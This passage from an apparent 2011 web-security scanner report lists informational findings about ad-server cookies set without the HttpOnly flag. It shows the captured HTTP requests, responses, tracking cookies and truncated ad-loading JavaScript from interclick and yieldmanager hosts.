document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Afunction%20pr_swfver%28%29%7B%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0Aif%28nv.plugins%26%26nv.mimeTypes.le
...[SNIP]...

11.41. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FC_51=167859=17623306:1&155104=17623306:1; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 14:17:12 GMT; path=/
IFC=n=4&w13501=4&a167861=2&e=634438973595758677&a167859=1&a155104=1; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 12:49:19 GMT; path=/
Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417&167859=634438162318162619:13501&155104=634438162329831901:13501; domain=.a1.interclick.com; expires=Wed, 14-Sep-2011 14:17:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=51&b=13501&cid=1240946757066&isif=t&rurld=www.cnbc.com&sl=false&dvp=http%3A//www.cnbc.com/id/43422860&rurl=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1308573230578&e90=1306586030476&e50=1308573231659&e100=1306586032110; Aqprep_Banner160X600=157033=634420788549939172:51744; Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; Li=1=734303&30=734277; ucap=sl=0; FC_53=167861=17623304:2; IFC=n=2&w13501=2&a167861=2&e=634438973595758677; Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744&167861=634438162292742581:13501

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=0; domain=.a1.interclick.com; expires=Sun, 26-Jun-2011 14:17:12 GMT; path=/
Set-Cookie: FC_51=167859=17623306:1&155104=17623306:1; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 14:17:12 GMT; path=/
Set-Cookie: IFC=n=4&w13501=4&a167861=2&e=634438973595758677&a167859=1&a155104=1; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 12:49:19 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417&167859=634438162318162619:13501&155104=634438162329831901:13501; domain=.a1.interclick.com; expires=Wed, 14-Sep-2011 14:17:12 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 14:17:12 GMT
Content-Length: 836

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3340.InterClick/B5375178.6%3Bsz%3D300x250%3Bpc%3D%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...

11.42. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!O!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!->h]!!!!#=(6n(!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; path=/; expires=Sat, 15-Jun-2013 13:08:55 GMT
vuday1=?:rWHd-=>Rd-=>RcerDr!4I`]rtIIv; path=/; expires=Fri, 17-Jun-2011 00:00:00 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=d96a784e%2d8901%2d47de%2d9dd1%2d4f91acb31514&s=1948192&_salt=2047538053&B=10&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308227126152%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; liday1=#`.48[w7YU!4I`]d1$yh; ih="b!!!!M!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=?:rWHcerDr!4I`]Z@Tzh; pv1="b!!!!'!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!([!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!(["; bh="b!!!$^!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!+=(68J!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$2?y!!!!#=(6?g"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0315.rm.bf1
Set-Cookie: ih="b!!!!O!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!->h]!!!!#=(6n(!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; path=/; expires=Sat, 15-Jun-2013 13:08:55 GMT
Set-Cookie: vuday1=?:rWHd-=>Rd-=>RcerDr!4I`]rtIIv; path=/; expires=Fri, 17-Jun-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:08:55 GMT
Pragma: no-cache
Content-Length: 830
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGlkFlugzAQhk8TnlBszGJSZFWErFKgpbUSKW8GTCAsocSUKKevraJeoCPrn03zjTWG6aEM22liJziHnOPE9QwTLtyFsbAZ1qHneQZyHGw72LL0kbrt8jNwdnG
...[SNIP]...

11.43. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%4!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!%=(6$+!!*lZ!!!!#=$Wj6!!*oY!!!!(=(6$+!!,WM!!!!#=$Wj6!!-9J!!!!#=(6#9!!-?2!!!!,=(6$+!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!#=(6$+!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!#=(6$+!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!LHY!!!!$=#$2R!!OgU!!!!#=(6$+!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!#=(6$+!!Rp$!!!!#='oUr!!ZUR!!!!#=$_dh!!Zwa!!!!,=(6$+!!Zwb!!!!(=(6$+!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!#=(6$+!!kl,!!!!#=(6$+!!mL?!!!!#=%=pu!!mo!!!!!#=(6$+!!nAs!!!!#=$Wj6!!pd!!!!!#=(6#9!!ry1!!!!'=!msj!!tjQ!!!!#=(6$+!!u*$!!!!%=!iXa!!uGk!!!!#=(6#9!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!#=(6$+!#-B#!!!!#=$G#-!#/<F!!!!#=(6#9!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#7(x!!!!#=(6$+!#7)S!!!!#=(6$+!#7)a!!!!#=(6$+!#8*]!!!!#=$G]3!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#=$5!!!!#=(6#9!#=)8!!!!#=(6#9!#=+f!!!!#=(6#9!#=WU!!!!#=(6#9!#=Z!!!!!#=(6#9!#=^%!!!!#=(6#9!#>0(!!!!#=(6#9!#?:V!!!!#=(6#9!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#O29!!!!#=(6$+!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#=(6$+!#Q2`!!!!#=(6#9!#Q_h!!!!#=%VvP!#Qu0!!!!#=#T`h!#SV*!!!!#=(6$+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#U_(!!!!#=#$.X!#V,:!!!!#=(6#9!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#X^J!!!!#=(6#9!#Z8A!!!!#=(6$+!#Z8E!!!!#=(6$+!#Ze*!!!!#=(6$+!#Zgo!!!!#=(6$+!#Zgs!!!!#=(6$+!#ZhT!!!!#=(6$+!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!+=(6$+!#]Z#!!!!(=(6$+!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!#=(6$+!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!#=(6$+!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!#=(6$+!#a=7!!!!#=(6$+!#a=9!!!!#=(6$+!#aEJ!!!!#=(6$+!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!#=(6$+!#c8X!!!!#=(6$+!#c8c!!!!#=(6$+!#c8i!!!!#=(6$+!#c8m!!!!+=(6$+!#c8p!!!!+=(6$+!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!#=(6$+!#fBk!!!!#=(6$+!#fBm!!!!#=(6$+!#fBn!!!!#=(6$+!#fFG!!!!#=#T_g!#fG)!!!!#=(6$+!#fG+!!!!#=(6$+!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!#=(6$+!#g<y!!!!#=(6$+!#g=r!!!!#=(6$+!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qu<!!!!#=(6#9!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#=(6$+!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#=(6$+!#uR3!!!!#=(6$+!#uR4!!!!#=(6$+!#uR7!!!!#=(6$+!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!#=(6#7!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#=(6$+!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!#=(6$+!$(!P!!!!#=(6$+!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$*hf!!!!#=(6$+!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$.U:!!!!#=(6$+!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$0VL!!!!#=(6$+!$0VM!!!!#=(6$+!$3IO!!!!#=(6$+!$3JS!!!!#=(6$+"; path=/; expires=Sat, 15-Jun-2013 11:28:23 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=56918&id=108885&id=526490&id=1249290&id=1050468&id=1009722&id=759133&id=1009963&id=931441&id=1347127&id=92489&id=1093177&id=1009959&id=1196052&id=1063928&id=74560&id=1086373&id=1196055&id=1264419&id=1086372&id=1063932&id=511794&id=1196049&id=1086370&id=926097&id=1086369&id=1196051&id=511793&id=1063935&id=1063922&id=1063912&id=1311913&id=1063910&id=957957&id=676732&id=1347038&id=1023315&id=1023316&id=759182&id=759195&id=1010018&id=1006093&id=1006089&id=1259575&id=1086731&id=1284585&id=1086733&id=1027058&id=397181&id=397180&id=1326466&id=323675&id=1326465&id=1041270&id=1093099&id=1187002&id=1049769&id=1049770&id=316334&id=576685&id=1049772&id=51778&id=1092015&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; liday1=#`.48[w7YU!4I`]d1$yh; 